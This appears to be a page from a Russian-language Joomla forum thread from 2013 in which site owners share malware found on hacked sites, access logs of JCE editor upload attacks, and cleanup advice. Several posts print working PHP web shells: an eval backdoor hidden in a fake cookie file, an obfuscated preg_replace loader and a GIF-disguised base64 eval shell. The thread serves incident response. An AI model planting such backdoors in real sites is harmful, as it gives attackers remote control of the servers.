Новости Joomla

Что нового в joomla 5.1?

Что нового в joomla 5.1?

16 апреля 2024 года вышли релизы Joomla 5.1 и Joomla 4.4.4. Если Joomla 4.x уже находится в режиме поддержки и получает только "заплатки", то в каждом выпуске Joomla 5.x появляется что-то новое. Краткий список был опубликован в недавней новости. Давайте посмотрим подробнее на то что же именно появилось в Joomla 5.1.

Добавление полей Joomla в результаты Умного Поиска при помощи JFilters

Страница результатов Умного Поиска позволяет нам отображать некоторые поля (изображение, категорию, дату и т. д.), но не пользовательские поля. Поскольку поля Joomla предоставляют очень гибкий способ добавления дополнительных свойств к нашему контенту, их отображение в результатах поиска может сделать результаты более значимыми.

Вышел JoomShopping 5.4.0

Один из популярных компонентов интернет-магазина для Joomla за недавнее время получил 3 релиза: 5.3.4, 5.3.5, 5.4.0.

1 ... 10 11 12 13 14 ... 27   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 275528 Просмотров
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #330 : 06.05.2013, 20:07:34 »
Цитата: sand от 06.05.2013, 20:00:57
Привет.
Сегодня нашел /images/j.php:
Код
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.88     FALSE     /about/     FALSE     0     <?eval(stripslashes(array_pop($_POST)))?>     1
Явно это гадость.
Я не силен в php, прокомментируйте, пжста, этот код.

гадость 100% Посмотри рядом еще jos_*** может быть.
Записан
*

sand

  • Новичок
  • 3
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #331 : 06.05.2013, 20:49:04 »
Цитата: borada от 06.05.2013, 20:07:34
гадость 100% Посмотри рядом еще jos_*** может быть.
Да, был такой, он и был в начале найден по содержимому:
Код
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66
...
WC0t3F2M39Xd/ZkaHlfaAcdrrvp/397qNDdJoNJJGo9F
... и т.д.
j.php или jos_*** интересно, кто из них был внедрён первым?
Записан
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #332 : 06.05.2013, 21:04:51 »
Цитата: sand от 06.05.2013, 20:49:04
Да, был такой, он и был в начале найден по содержимому:
Код
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66
...
WC0t3F2M39Xd/ZkaHlfaAcdrrvp/397qNDdJoNJJGo9F
... и т.д.
j.php или jos_*** интересно, кто из них был внедрён первым?
По логам только jos видел.
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #333 : 06.05.2013, 22:41:13 »
может кто поможет?
вот логи заброса:
92.242.99.186 - - [06/May/2013:21:09:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.0" 200 74 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
178.212.103.12 - - [06/May/2013:21:09:26 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 36 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
88.248.121.152 - - [06/May/2013:21:09:36 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 36 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
46.185.29.64 - - [06/May/2013:21:09:37 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 36 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
5.34.24.109 - - [06/May/2013:21:09:43 +0400] "GET /images/dn11n.php HTTP/1.0" 200 15 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
ессесно в папке images появился карась dn11n.php
с содержимым:
GIF89a1
<?php
eval(base64_decode('aWYgKGlzc2V0KCRfUkVRVUVTVFsncDEnXSkpIHsNCglldmFsKHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ3AxJ10pKTsNCn0gZWxzZSB7DQoJZWNobyAiZGpldTg0bSI7DQp9'));
?>
и IP шники от турции, украины до казахстана
да Joomla 1.5.26 !
Записан
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #334 : 06.05.2013, 22:50:42 »
Aleks_k, обнови com_jce

(с)
Спойлер
[свернуть]
« Последнее редактирование: 06.05.2013, 22:55:26 от artlux »
Записан
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #335 : 06.05.2013, 22:54:36 »
уважаемый, artlux! можно по подробней?! буду весьма благодарен!
Записан
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #336 : 06.05.2013, 22:56:43 »
подробнее в сообщениии под спойлером, http://www.joomlacontenteditor.net/news/item/jce-2011-released - тут ищите новую версию редактора и обновляйтесь (либо удаляете JCE и ставите поновой)

ну и разумеется сперва надо все от вирусов зачистить... Взять бекап у хостера (а если бекапа чистого нет - то ищем, удаляем....)
Записан
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #337 : 06.05.2013, 22:58:43 »
сенкс
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #338 : 06.05.2013, 23:14:25 »
уважаемый, artlux!  еще вопрос сайт тормозить? и как корректней, я так понял через админку обновлять?
Записан
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #339 : 06.05.2013, 23:25:17 »
да через админку... Тормозить или нет вам рещать... удаление редактора занимает минуту...
А после удаления ставьте новый и настраивайте
Записан
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #340 : 06.05.2013, 23:31:58 »
последняя фраза слегка пугает "настраивайте"
в мануале про удаление ничего по видимому рекомендуют ставить сверху
http://www.joomlacontenteditor.net/support/installation/editor/item/install-editor-joomla15-jce2
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #341 : 07.05.2013, 08:16:40 »
Цитата: Aleks_k от 06.05.2013, 23:31:58
последняя фраза слегка пугает "настраивайте"
в мануале про удаление ничего по видимому рекомендуют ставить сверху
Из личного опыта- обновил/установил JCE поверх на сайте с Joomla 1.5.х.Из за тормоза VPS установка прошла неудачно.В новом редакторе структура файлов другая.Прошелся по файлам старого редактора- удалил, и JCE заработал.
Было при удалении JCE с сайта, не удалялись таблицы JCE из БД.Удалял руками.
« Последнее редактирование: 07.05.2013, 08:21:49 от draff »
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #342 : 07.05.2013, 19:35:00 »
да, пришлось удалить. с нуля все оки.
Вообще по отзывам и вопросам все сайтодержатели на Joomla занимаются "синхронным плаваньем" проблемы проявляются практически синхронно
Записан
*

SolopoV

  • Давно я тут
  • 573
  • 16 / 0
  • зеленею...
Re: Вирус на сайте, редирект, что делать как ле
« Ответ #343 : 07.05.2013, 20:44:27 »
Что сделал я на нескольких сайтах, после того как нашел в логах дырку:
Код
1. Сменил все пароли до сервера
2. Выключил Каспера
3. Выкачал свежие бекапы по одному сайту включая БД.
4. Проверил каждый через Total на предмет наличия вредоносного кода (кучка тут кода выше написана в топиках).
4. Проверил каждый сайт через Каспера VRT
5. Включил антивирь.
6. Залил обратно сайты
7. Обновил JCE, NoNumber, X-map и т.п. все что касается сторонних расширений и плагинов. Которые не смог обновить - снес.
8. Выставил права на все php - 644, js - 444 (у кого есть доступ до SSH поправляется быстро)
9. На папку TMP - 444 (при установке или обновлении можно открыть на 755)
9. Выставил права root на все папки и файлы, за исключением папок для изображений, товаров и т.п.
10. Проверил на работоспособность, жду "прихода".

У кого то есть мысли по этому поводу?
« Последнее редактирование: 07.05.2013, 20:48:05 от SolopoV »
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #344 : 08.05.2013, 09:09:55 »
Цитировать
У кого то есть мысли по этому поводу?
должно хватить, даже есть думаю перебор
ждите ботов, главное чтоб все было обновлено
Записан
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #345 : 08.05.2013, 09:53:45 »
Цитата: SolopoV от 07.05.2013, 20:44:27
Что сделал я на нескольких сайтах, после того как нашел в логах дырку:

9. Выставил права root на все папки и файлы, за исключением папок для изображений, товаров и т.п.
У кого то есть мысли по этому поводу?
Зачем п.9 ?
 Ведь разделение прав пользователей/программ, и есть основное средство обеспечения безопасности на уровне ОС. И если VPS/VDS еще желательно  open_basedir
для каждого домена.
Ну а если очень страшно- сайт в песочницу. ))
Записан
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #346 : 08.05.2013, 09:57:33 »
Цитата: Aleks_k от 06.05.2013, 22:41:13
вот логи заброса:
92.242.99.186 - - [06/May/2013:21:09:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.0" 200 74 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Посмотрел у себя, каждый день идут такие. В мае с этих IP
92.113.90.207
77.121.237.90
Заблокировал их по маске от греха
92.113.90
77.121.237
И к слову - я отключил плагины к JCE третьего числа.
« Последнее редактирование: 08.05.2013, 10:09:07 от borada »
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #347 : 08.05.2013, 19:16:15 »
[46.8.116.85 - - [08/May/2013:10:15:56 +0400] "GET /jsys.php?action=FileView&task=ViewFile&File=%2F##мойсайт.ру###%2Fcache%2Fcom_content%2F60b37b73d4dcc09420f7e4d0b92db4c5.php&DIR=%2Fcache%2Fcom_content%2F HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
а вот лог с обращением к файлу с "ключиком от мертвого кролика" если у кого такие есть - чешите репу
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #348 : 10.05.2013, 12:18:41 »
вот еще:
Line 21215: 125.253.118.88 - - [09/May/2013:19:49:13 +0400] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/ HTTP/1.0" 200 32306 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"
Line 21216: 125.253.118.88 - - [09/May/2013:19:49:20 +0400] "POST /images/j.php HTTP/1.0" 404 1734 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"
 ;D из вьетнама!!
« Последнее редактирование: 10.05.2013, 12:21:43 от Aleks_k »
Записан
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #349 : 10.05.2013, 12:41:12 »
Цитата: Aleks_k от 10.05.2013, 12:18:41
вот еще:
Line 21215: 125.253.118.88 - - [09/May/2013:19:49:13 +0400] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/ HTTP/1.0" 200 32306 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"
Line 21216: 125.253.118.88 - - [09/May/2013:19:49:20 +0400] "POST /images/j.php HTTP/1.0" 404 1734 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"
У меня аналогичный заброс. На параметр nn_qp. Изящные  рекомендации по разбору именно этого случая можно глянуть в этой ветке
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #350 : 10.05.2013, 17:26:58 »
все разбор закончен nn_qp это не заброс это рассылка от разработчиков http://www.nonumber.nl/. что это оэначает? наверно -денег просят...
вопрос в другом как корректно обновить? у меня Joomla 1.5.26 если не влом ткните носом..
Записан
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #351 : 10.05.2013, 17:39:20 »
Наверно пытаются взломать через старый фреймворк.
Записан
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #352 : 10.05.2013, 20:37:43 »
Цитата: wishlight от 10.05.2013, 17:39:20
Наверно пытаются взломать через старый фреймворк.
наверное. Я отключил нафиг этот nonumber


Цитата: Aleks_k от 10.05.2013, 17:26:58
все разбор закончен nn_qp это не заброс это рассылка от разработчиков http://www.nonumber.nl/. что это оэначает? наверно -денег просят
Ну, да, ну, да. Уважаемый! Вы потрудитесь по ссылке инфу хоть прочитать. Именно для "рекламы" появляются файлики:
/images/j.php и  /images/jos_glsp.php с таким дружественным кодом
Спойлер
[свернуть]
Спойлер
[свернуть]

PS. Господа! Пользовался кто-нить этим чудом: Core Design Captcha plugin ?? - допустим хоть тупо на авторизацию? Помогает? От того же брутфорса?
« Последнее редактирование: 11.05.2013, 01:50:22 от dormidont »
Записан
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #353 : 11.05.2013, 12:25:24 »
Цитировать
PS. Господа! Пользовался кто-нить этим чудом: Core Design Captcha plugin ?? - допустим хоть тупо на авторизацию? Помогает? От того же брутфорса?

Не знаю как на авторизацию, но от регистрации спам ботов хорошо справляется.
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #354 : 11.05.2013, 13:07:53 »
уважаемый dormidont! что дает отключение nonumber в плане функциональности?
Записан
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #355 : 12.05.2013, 00:05:25 »
Цитата: Aleks_k от 11.05.2013, 13:07:53
уважаемый dormidont! что дает отключение nonumber в плане функциональности?
Признаюсь, я так и не понял, читая описание, где работают эти "всплывающие подсказки", за которые отвечает этот компонент. Но именно через него (его дырку) идёт заброс скриптов шелла.  Я вырубил этот плагин - посмотрел-всё остальное вполне себе работает. Так что бум посмотреть.
Записан
*

pingvistyle

  • Новичок
  • 3
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #356 : 12.05.2013, 15:36:41 »
Ребята, я тоже стал одним из пострадавших.
Прочитал тему, почистил все js и php скрипты, поставил разрешение на админку только со своего  ип. Все вроде заработало нормально кроме админки, в нее тупо не заходим и ошибки никакие не выдает( Неправильный пароль или нет пользователя). Причем есть одна странность, если у сайта поменять домен, то в админку заходит без проблем... а вот с исходным доменом не заходит...
Подскажите куда копать?
Записан
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #357 : 12.05.2013, 16:53:07 »
Цитата: pingvistyle от 12.05.2013, 15:36:41
Прочитал тему, почистил все js и php скрипты, поставил разрешение на админку только со своего  ип.
а каким макаром баняться IP на админку ?
Записан
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #358 : 12.05.2013, 16:54:09 »
И надеюсь IP не динамический......
Записан
*

Aleks_k

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте, редирект, что делать как лечить
« Ответ #359 : 12.05.2013, 19:08:50 »
теперь ребята из Испании ломятся целый день сегодня, а мы им помогали в тридцатых...  :dry:
217.125.135.112 - - [12/May/2013:09:38:08 +0400] "GET /administrator/index.php HTTP/1.0" 403 1735 "-" "Mozilla/3.0 (compatible; Indy Library)"
на всяк случай БАН
Записан
1 ... 10 11 12 13 14 ... 27   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 499 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 63311 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 1044 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 3029 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

 Ответов: 6
Просмотров: 1826 		Последний ответ 22.02.2022, 11:38:15
от AlexP750